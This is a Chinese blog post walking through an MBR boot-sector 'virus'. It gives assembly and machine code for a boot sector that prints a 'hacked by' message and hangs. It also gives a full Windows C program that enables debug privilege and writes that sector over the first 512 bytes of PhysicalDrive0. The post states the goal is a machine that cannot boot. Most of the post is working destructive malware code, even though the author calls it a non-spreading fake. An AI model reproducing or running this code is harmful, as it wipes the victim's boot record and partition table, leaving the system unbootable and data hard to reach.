获取中...

-

Just a minute...

改编一个mbr引导区病毒。

功能

一个简单的病毒(不能传播的假病毒),通过改写mbr,达到不能开机的效果😬

mbr

MBR是硬盘的主引导记录,也就是硬盘的0柱面、0磁头、1扇区称为主引导扇区。mbr占用512个字节(200h),它用于硬盘启动时将系统控制权交给用户指定的,所以就是先于操作系统拿到控制权。
计算机开机启动过程:https://thriumph.top/windows%E5%90%AF%E5%8A%A8%E8%BF%87%E7%A8%8B.html

病毒原理

1.准备要写入的mbr。
2.提升程序权限,调用CreateFile函数去打开物理驱动器的时候,必须具备调试权限,否则就会打开失败,打开失败我们就不能对mbr进行读取了。
3.写入mbr,这样就有拿到优先操作系统的控制权了。

汇编源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
assume cs:code 
code segment
start:
mov ax,12h ;使用12号功能,对显示器进行设置
int 10h ;显示器的设置
mov bp, 7C18H ;字符串的起始偏移
mov cx, 13h ;字符串长度
mov ax,1301h ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
mov bx,0Ch ;BH = 00H BL = 0CH
mov dx,0h ;起始的行列
int 10h
jmp $ ;无线循环,防止代码进入数据区
code ends
end start

获得机器码

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE
之后将想要显示的字符串添加到后面
68 61 63 6B 20 62 79 20 54 68 72 69 75 6D 70 68
21 14
最后两个字节必须是55AA,因为55AA是MBR的结束标志

编写mbr引导区病毒

主程序有两个函数,一个函数提权,一个函数写mbr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#include<windows.h>
#include<winioctl.h>
char temp[512]= {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,00,0xB8,0x01,0x13,0xBB,0x0C,00,0xBA,00,00,
0xCD,0x10,0xE2,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x54,0x68,0x72,0x69,0x75,
0x6D,0x70,0x68,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x55,0xAA
};

//自己写一个函数来提权。
void GetPrivileges()
{
//定义一个PLUID
HANDLE hProcess;
HANDLE hTokenHandle;
TOKEN_PRIVILEGES tp;
//获取当前进程的句柄
hProcess = GetCurrentProcess();
OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle);
//函数查看系统权限的特权值,返回信息到一个LUID结构体里。
tp.PrivilegeCount =1;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL);
CloseHandle(hTokenHandle);
CloseHandle(hProcess);
}
//下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
void ReadPHYSICALDRIVE0()
{
HANDLE hFile;
DWORD dwReadSize;
// char lpBuffer[512];
//使用createFile打开这个文件
char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
if (hFile == INVALID_HANDLE_VALUE)
{
MessageBox(0, "wrong", "wrong", 0);
}
//用readfile来读取文件
WriteFile(hFile, temp, 512, &dwReadSize, NULL);
}
int main()
{
GetPrivileges();
ReadPHYSICALDRIVE0();
return 0;
}
相关文章
评论
分享
  • windows启动过程

    一直好奇计算机是如何启动的?之几天看了几篇文章,记录了一下windows系统的启动过程。 预引导阶段(启动自检阶段)上个世纪70年代初,”只读内存”(read-only memory,缩写为ROM)发明,开机程序被刷入rom芯片,计...

    windows启动过程
  • windows消息钩取

    windows是一个消息驱动式系统。windows消息提供在应用程序与应用程序之间,应用程序与windows系统之间通信的手段。应用程序想要实现的功能由消息触发,通过对消息的响应和处理完成。 windows消息机制windows是...

    windows消息钩取
  • 网鼎杯部分wp

    pwnboom1分析远程已经打不通了,远程的偏移和本地的偏移不一样,只能复现一下本地的了。 首先看到流程图,代码量很大,有很大的switch语句和嵌套结构,可能是虚拟机或者是解析器。 从下图看出是一个C语言的解析器。 然后看了...

    网鼎杯部分wp
Please check the parameter of comment in config.yml of hexo-theme-Annie!